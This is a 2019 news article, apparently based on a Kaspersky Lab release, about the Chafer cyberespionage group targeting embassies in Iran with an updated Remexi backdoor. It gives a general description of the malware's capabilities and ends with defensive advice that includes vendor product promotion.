• About Us
    • Fact Checking Policy
    • Ownership & funding information
    • Volunteer
  • Subscribe
  • Letter submission
    • Submissions Policy
  • Contact Us
The Online Citizen Asia
  • Opinion
    • Editorial
    • Commentaries
    • Letters
    • Comments
  • Current Affairs
    • Singapore
    • Malaysia
    • Indonesia
    • China
    • ASEAN
    • Asia
    • International
  • Finance
    • Economics
    • Labour
    • Property
    • Business
  • Community
    • Arts & Culture
    • Consumer Watch
    • NGO
    • Lifestyle
    • Travel
  • Politics
    • Civil Society
    • Parliament
    • Transport
    • Education
    • Environment
    • Health
    • Housing
  • Law & Order
    • Legislation
    • Court Cases
No Result
View All Result
  • Opinion
    • Editorial
    • Commentaries
    • Letters
    • Comments
  • Current Affairs
    • Singapore
    • Malaysia
    • Indonesia
    • China
    • ASEAN
    • Asia
    • International
  • Finance
    • Economics
    • Labour
    • Property
    • Business
  • Community
    • Arts & Culture
    • Consumer Watch
    • NGO
    • Lifestyle
    • Travel
  • Politics
    • Civil Society
    • Parliament
    • Transport
    • Education
    • Environment
    • Health
    • Housing
  • Law & Order
    • Legislation
    • Court Cases
No Result
View All Result
The Online Citizen Asia
No Result
View All Result

Chafer cyberespionage group targets embassies with updated homebrew spyware

by onlinecitizen
01/02/2019
in Tech
Reading Time: 3 mins read
0

Hacker hands at work with interface around from Shutterstock.com

Kaspersky Lab researchers have detected multiple attempts to infect foreign diplomatic entities in Iran with homebrew spyware. The attacks appear to be using an updated Remexi backdoor. Several legitimate tools were also used during the campaign. The Remexi backdoor is linked to a suspected Farsi-speaking cyberespionage group known as Chafer, previously associated with the cyber-surveillance of individuals in the Middle East. The targeting of embassies could suggest a new focus for the group.

The operation highlights how threat actors in emerging regions are mounting campaigns against targets of interest using relatively basic, homebrew malware combined with publically available tools. In this instance, the attackers used an improved version of the Remexi backdoor – a tool that enables remote administration of a victim’s machine.

Remexi was first detected in 2015, being used by a cyberespionage group named Chafer for a cyber-surveillance operation targeting individuals and a number of organizations across the Middle East. The fact that the backdoor used in the new campaign has code similarities with known Remexi samples, combined with the target victim set means that Kaspersky Lab’s researchers have linked it to Chafer with medium confidence.

The newly discovered Remexi malware is able to execute commands remotely and to seize screenshots, browser data including user credentials, login data and history, and any typed text, among other things.

The stolen data is exfiltrated using the legitimate Microsoft Background Intelligent Transfer Service (BITS) application – a Windows component designed to enable background Windows updates.

The trend towards combining malware with appropriated or legitimate code helps attackers both to save time and resources when creating malware and to make attribution more complicated.

“When we talk about likely state-sponsored cyberespionage campaigns, people often imagine advanced operations with complex tools developed by experts. However, the people behind this spyware campaign look more like system administrators than sophisticated threat actors,” said Denis Legezo, security researcher at Kaspersky Lab

“They know how to code, but their campaign relies more on the creative use of tools that exist already, than on new, advanced features or elaborate architecture of the code. However, even relatively simple tools can cause significant damage so we urge organizations to protect their valuable information and systems against all level of threats, and to use threat intelligence to understand how the landscape is evolving,” he added.

To protect yourself from targeted spyware:

  • Use a proven, corporate grade security solution with anti-targeted attack capabilities and threat intelligence, such as Kaspersky Threat Management and Defense solution. It is capable of spotting and catching advanced targeted attacks by analyzing network anomalies and giving cybersecurity teams full visibility over the network and response automation.
  • Introduce security awareness initiatives enabling employees to master the skill of identifying suspicious messages. Email is common entry point for a targeted attack, and Kaspersky Lab customers would benefit from Kaspersky Security Awareness Training.
  • Provide your security team with access to up to date threat intelligence data, to keep pace with the latest tactics and tools used by cybercriminals, and enhance security controls already in use.

Read the full version of the report on Securelist.com.

For just US$7.50 a month, sign up as a subscriber on The Online Citizen Asia (and enjoy ads-free experience on our site) to support our mission to transform TOC into an alternative mainstream press.

Related Posts

AFP

India’s Modi hits back at opposition after Adani furore

08/02/2023
Pritam Singh’s speech on HDB affordability and accessibility
Politics

Pritam Singh’s speech on HDB affordability and accessibility

08/02/2023
Taiwan 34th Lantern Festival celebration signifies return to pre-pandemic normalcy
Arts & Culture

Taiwan 34th Lantern Festival celebration signifies return to pre-pandemic normalcy

08/02/2023
Six dead and eight injured in accident at Genting Highlands
Malaysia

Six dead and eight injured in accident at Genting Highlands

08/02/2023
Labour

Close to 70% of working Singaporeans above age of 65 earns less than S$2,500 a month

08/02/2023
Minister K Shanmugam appears to lack understanding of case where judge found bodycam footage debunked police officers’ sworn affidavits
Politics

Police investigations into conduct of WP’s Pritam Singh and Faisal Manap still ongoing: K Shanmugam

08/02/2023
Subscribe
Connect withD
Login
I allow to create an account
When you login first time using a Social Login button, we collect your account public profile information shared by Social Login provider, based on your privacy settings. We also get your email address to automatically create an account for you in our website. Once your account is created, you'll be logged-in to this account.
DisagreeAgree
Notify of
Connect withD
I allow to create an account
When you login first time using a Social Login button, we collect your account public profile information shared by Social Login provider, based on your privacy settings. We also get your email address to automatically create an account for you in our website. Once your account is created, you'll be logged-in to this account.
DisagreeAgree
0 Comments
Inline Feedbacks
View all comments

Latest posts

India’s Modi hits back at opposition after Adani furore

08/02/2023
Pritam Singh’s speech on HDB affordability and accessibility

Pritam Singh’s speech on HDB affordability and accessibility

08/02/2023
Taiwan 34th Lantern Festival celebration signifies return to pre-pandemic normalcy

Taiwan 34th Lantern Festival celebration signifies return to pre-pandemic normalcy

08/02/2023
Six dead and eight injured in accident at Genting Highlands

Six dead and eight injured in accident at Genting Highlands

08/02/2023

Close to 70% of working Singaporeans above age of 65 earns less than S$2,500 a month

08/02/2023
Minister K Shanmugam appears to lack understanding of case where judge found bodycam footage debunked police officers’ sworn affidavits

Police investigations into conduct of WP’s Pritam Singh and Faisal Manap still ongoing: K Shanmugam

08/02/2023
Malaysia’s seven-time Asean Para Games champion seen selling tissues at Bukit Bintang

Malaysia’s seven-time Asean Para Games champion seen selling tissues at Bukit Bintang

08/02/2023
53-year-old Singaporean worker dies after glass doors topple on him, fourth workplace fatality in 2023

53-year-old Singaporean worker dies after glass doors topple on him, fourth workplace fatality in 2023

08/02/2023

Trending posts

Cognizant India transfers staff to work in Singapore as recently as this year

Local IT grads can’t find jobs while engineers constantly transferred from India to work in SG under CECA

by Correspondent
05/02/2023
113

...

No response from Josephine Teo on whether Mediacorp has been instructed to stop coverage of SMT circulation scandal

No response from Josephine Teo over alleged blackout of coverage by Mediacorp over SMT circulation scandal

by Terry Xu
06/02/2023
13

...

Adani’s brother runs SG company and registers as director with local ID

Adani’s brother runs SG company and registers as director with local ID

by Correspondent
03/02/2023
26

...

Japanese-Canadian junior high school girl breaks national record with 3km in 9:02 mins

“I want my normal life back,” Sherry Drury withdraws from National Junior High School Tournament due to overheated public attention

by Yee Loon
06/02/2023
4

...

They have done a fine job of confusing us about the jobs situation

They have done a fine job of confusing us about the jobs situation

by Augustine Low
01/02/2023
48

...

19-year-old delivery rider in China covers 5km in 22 minutes to deliver antivenom to woman who had bitten by snake

19-year-old delivery rider in China covers 5km in 22 minutes to deliver antivenom to woman who had bitten by snake

by Yee Loon
06/02/2023
5

...

February 2019
M T W T F S S
 123
45678910
11121314151617
18192021222324
25262728  
« Jan   Mar »

The Online Citizen is a regional online publication based in Taiwan and formerly Singapore’s longest-running independent online media platform.

Navigation

  • Editorial
  • Commentaries
  • Opinion
  • Politics
  • Community

Support

  • Contact Us
  • Letter submission
  • Membership subscription

Follow Us

  • Facebook
  • Twitter
  • YouTube
  • Instagram
  • Fact Checking Policy
  • Privacy Policy

© 2022 - 2023 The Online Citizen Asia

No Result
View All Result
  • Opinion
    • Editorial
    • Commentaries
    • Comments
  • Current Affairs
    • Malaysia
    • Indonesia
    • China
    • ASEAN
    • Asia
    • International
  • Finance
    • Economics
    • Labour
    • Property
    • Business
  • Community
    • Civil Society
    • Arts & Culture
    • Consumer Watch
    • NGO
  • Politics
    • Parliament
    • Transport
    • Education
    • Environment
    • Health
    • Housing
  • Law & Order
    • Legislation
    • Court Cases
  • Lifestyle
    • Travel
  • Subscribers login

© 2022 - 2023 The Online Citizen Asia

wpDiscuz